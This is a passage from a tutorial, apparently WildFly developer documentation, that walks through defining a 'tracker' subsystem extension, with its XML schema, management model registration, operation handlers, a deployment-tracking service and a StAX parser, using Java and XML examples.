section.\n\n[[create-the-schema]]\n== Create the schema\n\nFirst, let us define the schema for our subsystem. Rename\n`src\/main\/resources\/schema\/mysubsystem.xsd` to\n`src\/main\/resources\/schema\/acme.xsd`. Then open `acme.xsd` and modify it\nto the following\n\n[source,xml,options=\"nowrap\"]\n----\n<xs:schema xmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\n targetNamespace=\"urn:com.acme.corp.tracker:1.0\"\n xmlns=\"urn:com.acme.corp.tracker:1.0\"\n elementFormDefault=\"qualified\"\n attributeFormDefault=\"unqualified\"\n version=\"1.0\">\n\u00a0\n <!-- The subsystem root element -->\n <xs:element name=\"subsystem\" type=\"subsystemType\"\/>\n <xs:complexType name=\"subsystemType\">\n <xs:all>\n <xs:element name=\"deployment-types\" type=\"deployment-typesType\"\/>\n <\/xs:all>\n <\/xs:complexType>\n <xs:complexType name=\"deployment-typesType\">\n <xs:choice minOccurs=\"0\" maxOccurs=\"unbounded\">\n <xs:element name=\"deployment-type\" type=\"deployment-typeType\"\/>\n <\/xs:choice>\n <\/xs:complexType>\n <xs:complexType name=\"deployment-typeType\">\n <xs:attribute name=\"suffix\" use=\"required\"\/>\n <xs:attribute name=\"tick\" type=\"xs:long\" use=\"optional\" default=\"10000\"\/>\n <\/xs:complexType>\n<\/xs:schema>\n----\n\nNote that we modified the `xmlns` and `targetNamespace` values to \ufeff\n`urn.com.acme.corp.tracker:1.0`. Our new `subsystem` element has a child\ncalled `deployment-types`, which in turn can have zero or more children\ncalled `deployment-type`. 
Each `deployment-type` has a required `suffix`\nattribute, and a `tick` attribute which defaults to `10000`.\n\nNow modify the `com.acme.corp.tracker.extension.SubsystemExtension`\nclass to contain the new namespace.\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemExtension implements Extension {\n\n \/** The name space used for the {@code subsystem} element *\/\n public static final String NAMESPACE = \"urn:com.acme.corp.tracker:1.0\";\n ...\n----\n\n[[design-and-define-the-model-structure]]\n== Design and define the model structure\n\nThe following example xml contains a valid subsystem configuration; we\nwill see how to plug this into WildFly later in this tutorial.\n\n[source,xml,options=\"nowrap\"]\n----\n<subsystem xmlns=\"urn:com.acme.corp.tracker:1.0\">\n <deployment-types>\n <deployment-type suffix=\"sar\" tick=\"10000\"\/>\n <deployment-type suffix=\"war\" tick=\"10000\"\/>\n <\/deployment-types>\n<\/subsystem>\n----\n\nNow when designing our model, we can either do a one to one mapping\nbetween the schema and the model or come up with something slightly or\nvery different. To keep things simple, let us stay pretty true to the\nschema so that when executing a `:read-resource(recursive=true)` against\nour subsystem we'll see something like:\n\n[source,options=\"nowrap\"]\n----\n{\n \"outcome\" => \"success\",\n \"result\" => {\"type\" => {\n \"sar\" => {\"tick\" => \"10000\"},\n \"war\" => {\"tick\" => \"10000\"}\n }}\n}\n----\n\nEach `deployment-type` in the xml becomes in the model a child resource\nof the subsystem's root resource. The child resource's child-type is\n`type`, and it is indexed by its `suffix`. Each `type` resource then\ncontains the `tick` attribute.\n\nWe also need a name for our subsystem; to set that, change\n`com.acme.corp.tracker.extension.SubsystemExtension`:\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemExtension implements Extension {\n ...\n \/** The name of our subsystem within the model. *\/\n public static final String SUBSYSTEM_NAME = \"tracker\";\n ...\n----\n\nOnce we are finished our subsystem will be available under\n`\/subsystem=tracker`.\n\nThe `SubsystemExtension.initialize()` method defines the model;\ncurrently it sets up the basics to add our subsystem to the model:\n\n[source,java,options=\"nowrap\"]\n----\n@Override\n public void initialize(ExtensionContext context) {\n \/\/register subsystem with its model version\n final SubsystemRegistration subsystem = context.registerSubsystem(SUBSYSTEM_NAME, 1, 0);\n \/\/register subsystem model with subsystem definition that defines all attributes and operations\n final ManagementResourceRegistration registration = subsystem.registerSubsystemModel(SubsystemDefinition.INSTANCE);\n \/\/register describe operation, note that this can be also registered in SubsystemDefinition\n registration.registerOperationHandler(DESCRIBE, GenericSubsystemDescribeHandler.INSTANCE, GenericSubsystemDescribeHandler.INSTANCE, false, OperationEntry.EntryType.PRIVATE);\n \/\/we can register additional submodels here\n \/\/\n subsystem.registerXMLElementWriter(parser);\n }\n----\n\nThe `registerSubsystem()` call registers our subsystem with the\nextension context. At the end of the method we register our parser with\nthe returned `SubsystemRegistration` to be able to marshal our\nsubsystem's model back to the main configuration file when it is\nmodified. We will add more functionality to this method later.\n
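\nFor orientation, once the module is built and installed, the extension and\nsubsystem end up referenced from the server configuration roughly as\nfollows (a sketch using the module name chosen earlier; the actual\ninstallation steps are covered later in this tutorial):\n\n[source,xml,options=\"nowrap\"]\n----\n<extensions>\n ...\n <extension module=\"com.acme.corp.tracker\"\/>\n<\/extensions>\n<profile>\n ...\n <subsystem xmlns=\"urn:com.acme.corp.tracker:1.0\">\n <deployment-types>\n <deployment-type suffix=\"war\" tick=\"10000\"\/>\n <\/deployment-types>\n <\/subsystem>\n<\/profile>\n----\n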
\n[[registering-the-core-subsystem-model]]\n=== Registering the core subsystem model\n\nNext we obtain a `ManagementResourceRegistration` by registering the\nsubsystem model. This is a *compulsory* step for every new subsystem.\n\n[source,java,options=\"nowrap\"]\n----\nfinal ManagementResourceRegistration registration = subsystem.registerSubsystemModel(SubsystemDefinition.INSTANCE);\n----\n\nIts parameter is an implementation of the `ResourceDefinition`\ninterface, which means that when you call\n`\/subsystem=tracker:read-resource-description` the information you see\ncomes from the model that is defined by `SubsystemDefinition.INSTANCE`.\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemDefinition extends SimpleResourceDefinition {\n public static final SubsystemDefinition INSTANCE = new SubsystemDefinition();\n\n private SubsystemDefinition() {\n super(SubsystemExtension.SUBSYSTEM_PATH,\n SubsystemExtension.getResourceDescriptionResolver(null),\n \/\/We always need to add an 'add' operation\n SubsystemAdd.INSTANCE,\n \/\/Every resource that is added, normally needs a remove operation\n SubsystemRemove.INSTANCE);\n }\n\n @Override\n public void registerOperations(ManagementResourceRegistration resourceRegistration) {\n super.registerOperations(resourceRegistration);\n \/\/you can register additional operations here\n }\n\n @Override\n public void registerAttributes(ManagementResourceRegistration resourceRegistration) {\n \/\/you can register attributes here\n }\n}\n----\n\nSince we need the child resource `type`, we will also need to add a new\n`ResourceDefinition` for it; we will do that below.\n\nThe `ManagementResourceRegistration` obtained in\n`SubsystemExtension.initialize()` is then used to add additional\noperations or to register submodels to the `\/subsystem=tracker` address.\nEvery subsystem and resource *must* have an `ADD` method, which can be\nachieved by the following line inside `registerOperations` in your\n`ResourceDefinition` or by providing it in the constructor of your\n`SimpleResourceDefinition`, just as we did in the example above.\n\n[source,java,options=\"nowrap\"]\n----\n\/\/We always need to add an 'add' operation\n resourceRegistration.registerOperationHandler(ADD, SubsystemAdd.INSTANCE, new DefaultResourceAddDescriptionProvider(resourceRegistration,descriptionResolver), false);\n----\n\nThe parameters when registering an operation handler are:\n\n1. *The name* - i.e. `ADD`.\n2. The handler instance - we will talk more about this below.\n3. The handler description provider - we will talk more about this\nbelow.\n4. Whether this operation handler is inherited - `false` means that\nthis operation is not inherited, and will only apply to\n`\/subsystem=tracker`. 
The content for this operation handler will be\nprovided by item `3.` (the description provider).\n\nLet us first look at the description provider, which is quite simple\nsince this operation takes no parameters. The addition of `type`\nchildren will be handled by another operation handler, as we will see\nlater on.\n\nThere are two ways to define a `DescriptionProvider`. One is to define it\nby hand using ModelNode, but as this has shown to be very error prone,\nthere are lots of helper methods to help you automatically describe the\nmodel. The following example manually defines the description\nprovider for the ADD operation handler:\n\n[source,java,options=\"nowrap\"]\n----\n\/**\n * Used to create the description of the subsystem add method\n *\/\n public static DescriptionProvider SUBSYSTEM_ADD = new DescriptionProvider() {\n public ModelNode getModelDescription(Locale locale) {\n \/\/The locale is passed in so you can internationalize the strings used in the descriptions\n\n final ModelNode subsystem = new ModelNode();\n subsystem.get(OPERATION_NAME).set(ADD);\n subsystem.get(DESCRIPTION).set(\"Adds the tracker subsystem\");\n\n return subsystem;\n }\n };\n----\n\nAlternatively, you can use the API that does this for you. For add and remove\nmethods the classes `DefaultResourceAddDescriptionProvider` and\n`DefaultResourceRemoveDescriptionProvider` do the work for you. In case\nyou use `SimpleResourceDefinition`, even that part is hidden from you.\n\n[source,java,options=\"nowrap\"]\n----\nresourceRegistration.registerOperationHandler(ADD, SubsystemAdd.INSTANCE, new DefaultResourceAddDescriptionProvider(resourceRegistration,descriptionResolver), false);\nresourceRegistration.registerOperationHandler(REMOVE, SubsystemRemove.INSTANCE, new DefaultResourceRemoveDescriptionProvider(resourceRegistration,descriptionResolver), false);\n----\n\nFor other operation handlers that are not add\/remove, you can use\n`DefaultOperationDescriptionProvider`, which takes an additional parameter\nfor the name of the operation and an optional array of the\nparameters\/attributes the operation takes. 
This is an example that registers the\noperation `add-mime` with two parameters:\n\n[source,java,options=\"nowrap\"]\n----\ncontainer.registerOperationHandler(\"add-mime\",\n MimeMappingAdd.INSTANCE,\n new DefaultOperationDescriptionProvider(\"add-mime\", Extension.getResourceDescriptionResolver(\"container.mime-mapping\"), MIME_NAME, MIME_VALUE));\n----\n\n[NOTE]\n\nWhen describing an operation, its description provider's `OPERATION_NAME`\nmust match the name used when calling\n`ManagementResourceRegistration.registerOperationHandler()`.\n\nNext we have the actual operation handler instance; note that we have\nchanged its `populateModel()` method to initialize the `type` child of\nthe model.\n\n[source,java,options=\"nowrap\"]\n----\nclass SubsystemAdd extends AbstractBoottimeAddStepHandler {\n\n static final SubsystemAdd INSTANCE = new SubsystemAdd();\n\n private SubsystemAdd() {\n }\n\n \/** {@inheritDoc} *\/\n @Override\n protected void populateModel(ModelNode operation, ModelNode model) throws OperationFailedException {\n log.info(\"Populating the model\");\n \/\/Initialize the 'type' child node\n model.get(\"type\").setEmptyObject();\n }\n ....\n----\n\n`SubsystemAdd` also has a `performBoottime()` method which is used for\ninitializing the deployer chain associated with this subsystem. We will\ntalk about the deployers later on. However, the basic idea for all\noperation handlers is that we do any model updates before changing the\nactual runtime state.\n\nThe rule of thumb is that everything that can be added can also be\nremoved, so we register a remove handler for the subsystem\nin `SubsystemDefinition.registerOperations`, or just provide the\noperation handler in the constructor.\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Every resource that is added, normally needs a remove operation\n registration.registerOperationHandler(REMOVE, SubsystemRemove.INSTANCE, new DefaultResourceRemoveDescriptionProvider(resourceRegistration,descriptionResolver), false);\n----\n\n`SubsystemRemove` extends `AbstractRemoveStepHandler`, which takes care\nof removing the resource from the model, so we don't need to override its\n`performRemove()` operation. Also, the add handler did not install any\nservices (services will be discussed later), so we can delete the\n`performRuntime()` method generated by the archetype.\n\n[source,java,options=\"nowrap\"]\n----\nclass SubsystemRemove extends AbstractRemoveStepHandler {\n\n static final SubsystemRemove INSTANCE = new SubsystemRemove();\n\n private final Logger log = Logger.getLogger(SubsystemRemove.class);\n\n private SubsystemRemove() {\n }\n}\n----\n\nThe description provider for the remove operation is simple and quite\nsimilar to that of the add handler, where just the name of the operation\nchanges.\n\n[[registering-the-subsystem-child]]\n=== Registering the subsystem child\n\nThe `type` child does not exist in our skeleton project, so we need to\nimplement the operations to add and remove them from the model.\n\nFirst we need an add operation to add the `type` child, so create a class\ncalled `com.acme.corp.tracker.extension.TypeAddHandler`. In this case we\nextend the `org.jboss.as.controller.AbstractAddStepHandler` class and\nimplement the `org.jboss.as.controller.descriptions.DescriptionProvider`\ninterface. 
`org.jboss.as.controller.OperationStepHandler` is the main\ninterface for the operation handlers, and `AbstractAddStepHandler` is an\nimplementation of that which does the plumbing work for adding a\nresource to the model.\n\n[source,java,options=\"nowrap\"]\n----\nclass TypeAddHandler extends AbstractAddStepHandler implements DescriptionProvider {\n\n public static final TypeAddHandler INSTANCE = new TypeAddHandler();\n\n private TypeAddHandler() {\n }\n----\n\nThen we define the subsystem model. Let's call it `TypeDefinition`, and for\nease of use let it extend `SimpleResourceDefinition` instead of just\nimplementing `ResourceDefinition`.\n\n[source,java,options=\"nowrap\"]\n----\npublic class TypeDefinition extends SimpleResourceDefinition {\n\n public static final TypeDefinition INSTANCE = new TypeDefinition();\n\n \/\/we define attribute named tick\nprotected static final SimpleAttributeDefinition TICK =\nnew SimpleAttributeDefinitionBuilder(TrackerExtension.TICK, ModelType.LONG)\n .setAllowExpression(true)\n .setXmlName(TrackerExtension.TICK)\n .setFlags(AttributeAccess.Flag.RESTART_ALL_SERVICES)\n .setDefaultValue(new ModelNode(1000))\n .setAllowNull(false)\n .build();\n\nprivate TypeDefinition(){\n super(TYPE_PATH, TrackerExtension.getResourceDescriptionResolver(TYPE),TypeAdd.INSTANCE,TypeRemove.INSTANCE);\n}\n\n@Override\npublic void registerAttributes(ManagementResourceRegistration resourceRegistration){\n resourceRegistration.registerReadWriteAttribute(TICK, null, TrackerTickHandler.INSTANCE);\n}\n\n}\n----\n\nThis will take care of describing the model for us. As you can see in the\nexample above, we define a `SimpleAttributeDefinition` named `TICK`; this\nis a mechanism for defining attributes in a more type safe way and for\nadding a more common API to manipulate attributes. Here we define a\ndefault value of 1000 as well as other constraints and capabilities. Other\nproperties could also be set, such as validators, alternate names, the xml\nname, and flags marking that the attribute allows expressions, among others.\n\nThen we do the work of updating the model by implementing the\n`populateModel()` method from the `AbstractAddStepHandler`, which\npopulates the model's attribute from the operation parameters. First we\nget hold of the model relative to the address of this operation (we will\nsee later that we will register it against `\/subsystem=tracker\/type=*`),\nso we just specify an empty relative address, and we then populate our\nmodel with the parameters from the operation. The `validateAndSet` operation\non `AttributeDefinition` helps us validate and set\nthe model based on the definition of the attribute.\n\n[source,java,options=\"nowrap\"]\n----\n@Override\n protected void populateModel(ModelNode operation, ModelNode model) throws OperationFailedException {\n TICK.validateAndSet(operation,model);\n }\n----\n\nWe then override the `performRuntime()` method to perform our runtime\nchanges, which in this case involves installing a service into the\ncontroller at the heart of WildFly\n(`AbstractAddStepHandler.performRuntime()` is similar to\n`AbstractBoottimeAddStepHandler.performBoottime()` in that the model is\nupdated before runtime changes are made).\n
\n[source,java,options=\"nowrap\"]\n----\n@Override\n protected void performRuntime(OperationContext context, ModelNode operation, ModelNode model,\n ServiceVerificationHandler verificationHandler, List<ServiceController<?>> newControllers)\n throws OperationFailedException {\n String suffix = PathAddress.pathAddress(operation.get(ModelDescriptionConstants.ADDRESS)).getLastElement().getValue();\n long tick = TICK.resolveModelAttribute(context,model).asLong();\n TrackerService service = new TrackerService(suffix, tick);\n ServiceName name = TrackerService.createServiceName(suffix);\n ServiceController<TrackerService> controller = context.getServiceTarget()\n .addService(name, service)\n .addListener(verificationHandler)\n .setInitialMode(Mode.ACTIVE)\n .install();\n newControllers.add(controller);\n }\n}\n----\n\nSince the add methods will be of the format\n`\/subsystem=tracker\/type=war:add(tick=1234)`, we look for the last\nelement of the operation address, which is `war` in the example just\ngiven, and use that as our suffix. We then create an instance of\nTrackerService, install that into the `service target` of the context,\nand add the created `service controller` to the `newControllers` list.\n\nThe tracker service is quite simple. All services installed into WildFly\nmust implement the `org.jboss.msc.service.Service` interface.\n\n[source,java,options=\"nowrap\"]\n----\npublic class TrackerService implements Service<TrackerService>{\n----\n\nWe then have some fields to keep the tick count and a thread which, when\nrun, outputs all the deployments registered with our service.\n\n[source,java,options=\"nowrap\"]\n----\nprivate AtomicLong tick = new AtomicLong(10000);\n\n private Set<String> deployments = Collections.synchronizedSet(new HashSet<String>());\n private Set<String> coolDeployments = Collections.synchronizedSet(new HashSet<String>());\n private final String suffix;\n\n private Thread OUTPUT = new Thread() {\n @Override\n public void run() {\n while (true) {\n try {\n Thread.sleep(tick.get());\n System.out.println(\"Current deployments deployed while \" + suffix + \" tracking active:\\n\" + deployments\n + \"\\nCool: \" + coolDeployments.size());\n } catch (InterruptedException e) {\n interrupted();\n break;\n }\n }\n }\n };\n\n public TrackerService(String suffix, long tick) {\n this.suffix = suffix;\n this.tick.set(tick);\n }\n----\n\nNext we have three methods which come from the `Service` interface.\n`getValue()` returns this service, `start()` is called when the service\nis started by the controller, `stop` is called when the service is\nstopped by the controller, and they start and stop the thread outputting\nthe deployments.\n\n[source,java,options=\"nowrap\"]\n----\n@Override\n public TrackerService getValue() throws IllegalStateException, IllegalArgumentException {\n return this;\n }\n\n @Override\n public void start(StartContext context) throws StartException {\n OUTPUT.start();\n }\n\n @Override\n public void stop(StopContext context) {\n OUTPUT.interrupt();\n }\n----\n\nNext we have a utility method to create the `ServiceName` which is used\nto register the service in the controller.\n\n[source,java,options=\"nowrap\"]\n----\npublic static ServiceName createServiceName(String suffix) {\n return ServiceName.JBOSS.append(\"tracker\", suffix);\n}\n----\n
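\nHaving a well-known `ServiceName` means that other code can look the\nservice up from the service registry later on. For example, the\nwrite-attribute handler we will add below retrieves the service roughly\nlike this (a sketch; `getServiceRegistry(true)` may only be called from a\nstep in the `RUNTIME` stage):\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Look up the TrackerService that was installed for the \"war\" suffix\nTrackerService service = (TrackerService) context.getServiceRegistry(true)\n .getRequiredService(TrackerService.createServiceName(\"war\"))\n .getValue();\n\/\/...and adjust how often it prints its report\nservice.setTick(5000);\n----\n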
\nFinally, we have some methods to add and remove deployments, and to set\nand read the `tick`. The 'cool' deployments will be explained later.\n\n[source,java,options=\"nowrap\"]\n----\npublic void addDeployment(String name) {\n deployments.add(name);\n }\n\n public void addCoolDeployment(String name) {\n coolDeployments.add(name);\n }\n\n public void removeDeployment(String name) {\n deployments.remove(name);\n coolDeployments.remove(name);\n }\n\n void setTick(long tick) {\n this.tick.set(tick);\n }\n\n public long getTick() {\n return this.tick.get();\n }\n}\/\/TrackerService - end\n----\n\nSince we are able to add `type` children, we need a way to be able to\nremove them, so we create a\n`com.acme.corp.tracker.extension.TypeRemoveHandler`. In this case we\nextend `AbstractRemoveStepHandler`, which takes care of removing the\nresource from the model, so we don't need to override its\n`performRemove()` operation. But we need to implement the\n`DescriptionProvider` method to provide the model description, and since\nthe add handler installs the TrackerService, we need to remove that in\nthe `performRuntime()` method.\n\n[source,java,options=\"nowrap\"]\n----\npublic class TypeRemoveHandler extends AbstractRemoveStepHandler {\n\n public static final TypeRemoveHandler INSTANCE = new TypeRemoveHandler();\n\n private TypeRemoveHandler() {\n }\n\n @Override\n protected void performRuntime(OperationContext context, ModelNode operation, ModelNode model) throws OperationFailedException {\n String suffix = PathAddress.pathAddress(operation.get(ModelDescriptionConstants.ADDRESS)).getLastElement().getValue();\n ServiceName name = TrackerService.createServiceName(suffix);\n context.removeService(name);\n }\n\n}\n----\n\nWe then need a description provider for the `type` part of the model\nitself, so we modify `TypeDefinition` to register the `tick` attribute:\n\n[source,java,options=\"nowrap\"]\n----\nclass TypeDefinition{\n...\n@Override\npublic void registerAttributes(ManagementResourceRegistration resourceRegistration){\n resourceRegistration.registerReadWriteAttribute(TICK, null, TrackerTickHandler.INSTANCE);\n}\n\n}\n----\n\nThen finally we need to specify that our new `type` child and associated\nhandlers go under `\/subsystem=tracker\/type=*` in the model by\nregistering it with the model in `SubsystemExtension.initialize()`. So\nwe add the following just before the end of the method.\n\n[source,java,options=\"nowrap\"]\n----\n@Override\npublic void initialize(ExtensionContext context)\n{\n final SubsystemRegistration subsystem = context.registerSubsystem(SUBSYSTEM_NAME, 1, 0);\n final ManagementResourceRegistration registration = subsystem.registerSubsystemModel(TrackerSubsystemDefinition.INSTANCE);\n \/\/Add the type child\n ManagementResourceRegistration typeChild = registration.registerSubModel(TypeDefinition.INSTANCE);\n subsystem.registerXMLElementWriter(parser);\n}\n----\n\nThe above first creates a child of our main subsystem registration for\nthe relative address `type=*`, and gets the `typeChild` registration.\nTo this we add the `TypeAddHandler` and `TypeRemoveHandler` (via the\n`TypeDefinition` constructor): the add variety is registered under the\nname `add`, the remove handler under the name `remove`, and for each\nregistered operation handler we use the handler singleton instance as\nboth the handler parameter and as the `DescriptionProvider`.\n
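\nWith this in place, a hypothetical CLI session against a running server\ncould manage `type` children like this (a sketch; plugging the subsystem\ninto the server is covered later in this tutorial):\n\n[source,options=\"nowrap\"]\n----\n\/subsystem=tracker\/type=sar:add(tick=10000)\n\/subsystem=tracker\/type=sar:read-resource\n\/subsystem=tracker\/type=sar:remove\n----\n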
\nFinally, we register `tick` as a read\/write attribute. The null\nparameter means we don't do anything special with regards to reading it;\nfor the write handler we supply an operation handler called\n`TrackerTickHandler`.\nRegistering it as a read\/write attribute means we can use the\n`:write-attribute` operation to modify the value of the parameter, and\nit will be handled by `TrackerTickHandler`.\n\nNot registering a write attribute handler makes the attribute read only.\n\n`TrackerTickHandler` extends `AbstractWriteAttributeHandler`\ndirectly, and so must implement its `applyUpdateToRuntime` and\n`revertUpdateToRuntime` methods.\nThis takes care of model manipulation (validation, setting) but leaves\nus to deal with just what we need to do.\n\n[source,java,options=\"nowrap\"]\n----\nclass TrackerTickHandler extends AbstractWriteAttributeHandler<Void> {\n\n public static final TrackerTickHandler INSTANCE = new TrackerTickHandler();\n\n private TrackerTickHandler() {\n super(TypeDefinition.TICK);\n }\n\n protected boolean applyUpdateToRuntime(OperationContext context, ModelNode operation, String attributeName,\n ModelNode resolvedValue, ModelNode currentValue, HandbackHolder<Void> handbackHolder) throws OperationFailedException {\n\n modifyTick(context, operation, resolvedValue.asLong());\n\n return false;\n }\n\n protected void revertUpdateToRuntime(OperationContext context, ModelNode operation, String attributeName, ModelNode valueToRestore, ModelNode valueToRevert, Void handback) throws OperationFailedException {\n modifyTick(context, operation, valueToRestore.asLong());\n }\n\n private void modifyTick(OperationContext context, ModelNode operation, long value) throws OperationFailedException {\n\n final String suffix = PathAddress.pathAddress(operation.get(ModelDescriptionConstants.ADDRESS)).getLastElement().getValue();\n TrackerService service = (TrackerService) context.getServiceRegistry(true).getRequiredService(TrackerService.createServiceName(suffix)).getValue();\n service.setTick(value);\n }\n\n}\n----\n\nThe operation used to execute this will be of the form\n`\/subsystem=tracker\/type=war:write-attribute(name=tick,value=12345)`, so\nwe first get the `suffix` from the operation address, and the `tick`\nvalue from the operation parameter's `resolvedValue` parameter, and use\nthat to update the model.\n\nWe then add a new step associated with the `RUNTIME` stage to update the\ntick of the TrackerService for our suffix. This is essential since the\ncall to `context.getServiceRegistry()` will fail unless the step\naccessing it belongs to the `RUNTIME` stage.\n\n[NOTE]\n\nWhen implementing `execute()`, you *must* call `context.completeStep()`\nwhen you are done.\n\n[[parsing-and-marshalling-of-the-subsystem-xml]]\n== Parsing and marshalling of the subsystem xml\n\nWildFly uses the Stax API to parse the xml files. 
This is initialized in\n`SubsystemExtension` by mapping our parser onto our namespace:\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemExtension implements Extension {\n\u00a0\n \/** The name space used for the {@code subsystem} element *\/\n public static final String NAMESPACE = \"urn:com.acme.corp.tracker:1.0\";\n ...\n protected static final PathElement SUBSYSTEM_PATH = PathElement.pathElement(SUBSYSTEM, SUBSYSTEM_NAME);\n\u00a0\u00a0\u00a0 protected static final PathElement TYPE_PATH = PathElement.pathElement(TYPE);\n\u00a0\n \u00a0\/** The parser used for parsing our subsystem *\/\n private final SubsystemParser parser = new SubsystemParser();\n\u00a0\n \u00a0@Override\n public void initializeParsers(ExtensionParsingContext context) {\n context.setSubsystemXmlMapping(NAMESPACE, parser);\n }\n ...\n----\n\nWe then need to write the parser. The contract is that we read our\nsubsystem's xml and create the operations that will populate the model\nwith the state contained in the xml. These operations will then be\nexecuted on our behalf as part of the parsing process. The entry point\nis the `readElement()` method.\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemExtension implements Extension {\n\u00a0\n \/**\n * The subsystem parser, which uses stax to read and write to and from xml\n *\/\n private static class SubsystemParser implements XMLStreamConstants, XMLElementReader<List<ModelNode>>, XMLElementWriter<SubsystemMarshallingContext> {\n\u00a0\n \/** {@inheritDoc} *\/\n @Override\n public void readElement(XMLExtendedStreamReader reader, List<ModelNode> list) throws XMLStreamException {\n \/\/ Require no attributes\n ParseUtils.requireNoAttributes(reader);\n\u00a0\n \/\/Add the main subsystem 'add' operation\n final ModelNode subsystem = new ModelNode();\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 subsystem.get(OP).set(ADD);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 subsystem.get(OP_ADDR).set(PathAddress.pathAddress(SUBSYSTEM_PATH).toModelNode());\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 list.add(subsystem);\n\u00a0\n \/\/Read the children\n while (reader.hasNext() && reader.nextTag() != END_ELEMENT) {\n if (!reader.getLocalName().equals(\"deployment-types\")) {\n throw ParseUtils.unexpectedElement(reader);\n }\n while (reader.hasNext() && reader.nextTag() != END_ELEMENT) {\n if (reader.isStartElement()) {\n readDeploymentType(reader, list);\n }\n }\n }\n }\n\u00a0\n private void readDeploymentType(XMLExtendedStreamReader reader, List<ModelNode> list) throws XMLStreamException {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 if (!reader.getLocalName().equals(\"deployment-type\")) {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 throw ParseUtils.unexpectedElement(reader);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ModelNode addTypeOperation = new ModelNode();\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 addTypeOperation.get(OP).set(ModelDescriptionConstants.ADD);\n\u00a0\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 String suffix = null;\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 for (int i = 0; i < reader.getAttributeCount(); i++) {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 String attr = 
reader.getAttributeLocalName(i);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 String value = reader.getAttributeValue(i);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 if (attr.equals(\"tick\")) {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 TypeDefinition.TICK.parseAndSetParameter(value, addTypeOperation, reader);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 } else if (attr.equals(\"suffix\")) {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 suffix = value;\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 } else {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 throw ParseUtils.unexpectedAttribute(reader, i);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ParseUtils.requireNoContent(reader);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 if (suffix == null) {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 throw ParseUtils.missingRequiredElement(reader, Collections.singleton(\"suffix\"));\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\n\u00a0\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/Add the 'add' operation for each 'type' child\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 PathAddress addr = PathAddress.pathAddress(SUBSYSTEM_PATH, PathElement.pathElement(TYPE, suffix));\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 addTypeOperation.get(OP_ADDR).set(addr.toModelNode());\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 list.add(addTypeOperation);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\n ...\n----\n\nSo in the above we always create the add operation for our subsystem.\nDue to its address `\/subsystem=tracker` defined by `SUBSYSTEM_PATH` this\nwill trigger the `SubsystemAddHandler` we created earlier when we invoke\n`\/subsystem=tracker:add`. We then parse the child elements and create an\nadd operation for the child address for each `type` child. 
